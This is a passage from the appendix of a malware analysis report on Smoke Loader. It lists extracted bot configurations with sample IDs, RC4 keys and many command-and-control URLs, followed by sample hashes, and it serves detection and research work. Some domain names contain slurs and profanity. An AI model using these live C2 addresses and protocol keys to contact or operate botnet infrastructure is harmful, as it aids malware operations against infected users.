{u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': 
u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'10057'), (u'domains', [{u'cnc': u'http://burbulator.bit/'}, 
{u'cnc':\r\nu'http://burbulator.bit/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'10k'), (u'domains', [{u'cnc':\r\nu'http://mailserv.xsayeszhaifa.bit/hosting2/'}, {u'cnc': u'http://mailserv.nutsystem323z.bit/hosting2/'},\r\n{u'cnc': u'http://mailserv.nutsystem324z.bit/hosting2/'}, {u'cnc':\r\nu'http://mailserv.nutsystem325z.bit/hosting2/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'11111'), (u'domains', [{u'cnc': u'http://hsbc-auth-2.ru/smk/index.php'}, {u'cnc': u'http://wasduherwasgu.net/smk/index.php'}, {u'cnc':\r\nu'http://tanenzwut-tan.su/smk/index.php'}, {u'cnc': u'http://libersmicshliber.com/smk/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'11111'), (u'domains', [{u'cnc':\r\nu'http://kooldoomroom.net/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.biz/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.online/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.tech/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.org/ww/hok/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'1203'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': 
u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, 
{u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': 
u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://1478520.bid/sm/'},\r\n{u'cnc': u'http://1478520.bid/sm/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://2ancisco.net/hhr_dump/'}, {u'cnc': u'http://dbonzjones.com/hhr_dump/'}, {u'cnc':\r\nu'http://2gillick.com/hhr_dump/'}, {u'cnc': u'http://dbonzjns.org/hhr_dump/'}, {u'cnc':\r\nu'http://seotyy56.co.uk/hhr_dump/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://aladin40chor.com/'},\r\n{u'cnc': u'http://aladin40chor.net/'}, {u'cnc': u'http://aladin40chor.org/'}, {u'cnc':\r\nu'http://aladin40chor.co/'}, {u'cnc': u'http://aladin40chor.us/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://aoids03wkde38.us/'},\r\n{u'cnc': u'http://aoids03wkde38.win/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://buildsae.org/'}, {u'cnc':\r\nu'http://buildsae.us/'}, {u'cnc': u'http://bulentisik.com/'}, {u'cnc': u'http://bumpcaster.com/'}, {u'cnc':\r\nu'http://burcumemlak.org/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://cctoday.info/'}, {u'cnc':\r\nu'http://globalapps.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://coifn333.info/'}, {u'cnc':\r\nu'http://coifn332323233.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://davaimani.com/'},\r\n{u'cnc': u'http://zemaxfthegdf.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://djsnfjsdnfjksfnsk33.info/'}, {u'cnc': u'http://dksadnidj2d2nksmfs.info/'}, {u'cnc':\r\nu'http://dowaijdiwji32333kdkskd.info/'}, {u'cnc': u'http://vankapolka2992929.info/'}, 
{u'cnc':\r\nu'http://trolikjamolka92828.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://gedmanshwarz432.biz/fs/'}, {u'cnc': u'http://gedmanshwarz432.biz/fs/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://hurtmehard.net/'},\r\n{u'cnc': u'http://hurtmehard.net/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jabberanimal.biz/'},\r\n{u'cnc': u'http://jabberanimal.biz/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jamspune26.top/'},\r\n{u'cnc': u'http://battterlog.info/'}, {u'cnc': u'http://namaste-advices.net/'}, {u'cnc': u'http://lojka-s-vilkoy22.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jokertube.org/'}, {u'cnc':\r\nu'http://jokertube.org/smoke/mp.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jokertube.org/forum/'},\r\n{u'cnc': u'http://jokertube.org/forum/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://kachapaka.net.in/'},\r\n{u'cnc': u'http://kachapaka.net.in/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://lago666.com/smk/log.php'}, {u'cnc': u'http://lago666.xyz/smk/log.php'}, {u'cnc':\r\nu'http://lago666.online/smk/log.php'}, {u'cnc': u'http://lago666.website/smk/log.php'}, {u'cnc':\r\nu'http://lago666.site/smk/log.php'}, {u'cnc': u'http://lago666.pw/smk/log.php'}, {u'cnc':\r\nu'http://lago666.space/smk/log.php'}, {u'cnc': u'http://lago666.top/smk/log.php'}, {u'cnc':\r\nu'http://lago666.tech/smk/log.php'}, {u'cnc': u'http://lago666.bid/smk/log.php'}, {u'cnc':\r\nu'http://lago666.trade/smk/log.php'}, {u'cnc': u'http://lago666.webcam/smk/log.php'}, {u'cnc':\r\nu'http://lago666.press/smk/log.php'}, {u'cnc': 
u'http://lago666.host/smk/log.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://livespirit.at/me/'},\r\n{u'cnc': u'http://springhate.at/me/'}, {u'cnc': u'http://treasurehunter.at/me/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://mailserv.xsayeszhaifa.bit/hosting2/'}, {u'cnc': u'http://mailserv.nutsystem323z.bit/hosting2/'},\r\n{u'cnc': u'http://mailserv.nutsystem324z.bit/hosting2/'}, {u'cnc':\r\nu'http://mailserv.nutsystem325z.bit/hosting2/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://microsoftupdate.bit/'},\r\n{u'cnc': u'http://mobileupdate.bit/'}, {u'cnc': u'http://securityupdate.bit/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://r2wtm2gmt7qnq7agmrjxvqsr.info/'}, {u'cnc': u'http://ydertlcu6vfzp3vfg52knrvk.pw/'}, {u'cnc':\r\nu'http://jwpqhtjhvgtm46jfsakxgrbk.pw/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://rozek15.com/'}, {u'cnc':\r\nu'http://bear5678.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://slimbest.su/'}, {u'cnc':\r\nu'http://slimbest.su/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://smoke.nutsystem3210z.bit/hosting/'}, {u'cnc': u'http://smoke.nutsystem322z.bit/hosting/'},\r\n{u'cnc': u'http://smoke.nutsystem323z.bit/hosting/'}, {u'cnc':\r\nu'http://smoke.nutsystem324z.bit/hosting/'}, {u'cnc': u'http://smoke.nutsystem325z.bit/hosting/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://superavalanche.at/try/'},\r\n{u'cnc': u'http://8b018df4077060ac0570a2cd9e1f2f9b.at/try/'}, {u'cnc': u'http://springback.at/try/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://www.infoweather.net/'},\r\n{u'cnc': 
u'http://informerpro.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'https://dbwealthfunds.info/admin/'}, {u'cnc': u'https://dbwealthtools.info/admin/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'1403'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, 
{u'cnc':\r\nu'http://tanromerefket.win/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'miner'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'NEW27'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'newnw'), (u'rc4_key_resp', u'0xbe6b0e7d'), (u'rc4_key_req',\r\nu'0xf115307e'), (u'domains', [{u'cnc': u'http://imanigger123f.online/cock/'}, {u'cnc':\r\nu'http://dontgiveafucknymore.su/cock/'}, {u'cnc': u'http://hackhackerhack3.bid/cock/'}, {u'cnc':\r\nu'http://dontfuckinghackme2.win/cock/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'nitly'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 58 of 63\n\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'nuke'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'OLDBB'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, 
{u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'OLDBB'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://boboxmr.ru/'}, {u'cnc': u'http://boboboxmr.ru/'}, {u'cnc':\r\nu'http://boboboboxmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'OLDBM'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://bomonero.su/'}, {u'cnc': u'http://monerobo.su/'}, {u'cnc':\r\nu'http://bomonero2.su/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'pepes'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'peren'), (u'rc4_key_resp', u'0x3dd8ff8e'), (u'rc4_key_req',\r\nu'0x18888780'), (u'domains', [{u'cnc': u'http://charlesadvanced.top/'}, {u'cnc':\r\nu'http://kathrinewesson.top/'}, {u'cnc': u'http://advertisersbellboy.top/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'STUB2'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'STUB3'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'TEST1'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'testl'), (u'rc4_key_resp', 
u'0xa0567c9e'), (u'rc4_key_req',\r\nu'0xc90e7080'), (u'domains', [{u'cnc': u'http://domhoappst.xyz/'}, {u'cnc': u'http://domhoappst.xyz/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'xxxxx'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://cb2017.ru/'}, {u'cnc': u'http://2017cb.ru/'}, {u'cnc':\r\nu'http://cb17.ru/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 59 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u'yeshi'), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'yyyyy'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x152b4cad'), (u'rc4_key_req',\r\nu'0xe6327736'), (u'domains', [{u'cnc': u'http://migyno.bid/'}, {u'cnc': u'http://migyno.win/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x152b4cad'), (u'rc4_key_req',\r\nu'0xe6327736'), (u'domains', [{u'cnc': u'https://exvirnani.win/'}, {u'cnc': u'https://exvirnani.bid/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x3287a63'), (u'rc4_key_req',\r\nu'0xfdcfac42'), (u'domains', [{u'cnc': u'http://housingcorp.net/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x55caff7d'), (u'rc4_key_req',\r\nu'0x668caa56'), (u'domains', [{u'cnc': u'https://exmach.win/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x55caff7d'), (u'rc4_key_req',\r\nu'0x668caa56'), (u'domains', [{u'cnc': 
u'https://experttools.stream/'}, {u'cnc':\r\nu'https://experttools.ml/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0x77460d95'), (u'rc4_key_req',\r\nu'0x5a7bf6e6'), (u'domains', [{u'cnc': u'http://lillano.se/'}, {u'cnc': u'http://custom-sslconection.com/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0xd278d61a'), (u'rc4_key_req',\r\nu'0x9c509bec'), (u'domains', [{u'cnc': u'http://mediainfo.xyz/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u''), (u'rc4_key_resp', u'0xf0030a01'), (u'rc4_key_req',\r\nu'0x5ffdf3fe'), (u'domains', [{u'cnc': u'http://cindyarrest.bid/'}, {u'cnc':\r\nu'http://andersenavoidably.bid/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'0806'), (u'rc4_key_resp', u'0xf0030a01'), (u'rc4_key_req',\r\nu'0x5ffdf3fe'), (u'domains', [{u'cnc': u'http://wozzeckskasai.bid/'}, {u'cnc':\r\nu'http://bateclobbered.bid/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'amaz'), (u'rc4_key_resp', u'0x77460d95'), (u'rc4_key_req',\r\nu'0x5a7bf6e6'), (u'domains', [{u'cnc': u'http://lillano.se/'}, {u'cnc': u'http://custom-sslconection.com/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'bus'), (u'rc4_key_resp', u'0x78821544'), (u'rc4_key_req',\r\nu'0xaf03e678'), (u'domains', [{u'cnc': u'http://servicecredits2.4irc.com/'}, {u'cnc':\r\nu'http://servicecredits1.4irc.com/'}])]\r\n[(u'smk_magic', 2018), (u'sample_id', u'test'), (u'rc4_key_resp', u'0x121da0f3'), (u'rc4_key_req',\r\nu'0x1c16c0a2'), (u'domains', [{u'cnc': u'http://gateway777.my/'}, {u'cnc': u'http://winnapi.com/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 60 of 63\n\n[(u'smk_magic', 2018), (u'sample_id', u'Traf'), (u'rc4_key_resp', u'0xb61de5bb'), (u'rc4_key_req',\r\nu'0xdbe946d2'), (u'domains', [{u'cnc': u'https://mollikertes.win/prof/index.php'}, 
{u'cnc':\r\nu'https://rocknrolletco.top/prof/index.php'}])]\r\nHashes:\r\nd68bbc1c707d093488cd95c75090cd56bc5d2eabba375dd3e3e2731ee8969945\r\n9ad749b1da7ca205ae9f5fefa91342a48d91eedfef15cbdf2f5ed7c878ea80dc\r\n7d449f036fd0b8dff39148a7964ebd941d6694e122861b9ae764ded2aa143203\r\n2235babf7a3a3545611adeae64a083dbf7eee960db17fe68ee9c8bcff36dd3b9\r\na021999d1153d87f8f21eb98fe4d34dd3d6b38eed28b831c0b5302f630e482c3\r\nb65806521aa662bff2c655c8a7a3b6c8e598d709e35f3390df880a70c3fded40\r\n67c13df5d4169b6c95c48fb149f8b8cd11dd3b045a51d4f12e0397ccd7e2384a\r\ncd955ad86a10ed6cb973192b99597b6fef6e4048ba9990dcad4cce5cbe6bbf26\r\n1075e8d7330ce9d73cc6db6d08d9963fe38a33de58d255a9d3cf2a548abab7ab\r\n7544141eb65a5bb0c2e3e4909af000006f75afc70cad56107dbf5445dfa830a0\r\n70b82194b4394e49968065bf4f4d9cbff4a9f3c4d0edce0282da8e766b553b72\r\n0458aae969b5e8da81f8db283d4706d146b62dbdacc45a4ea28b9c5af9ac2ea7\r\n71b83a8f1c813489936a1fa884efe753dc72c3e42fc09191d5b188addac7a50f\r\n35a532b10e8602afcb5d55c608f6fec7298d6174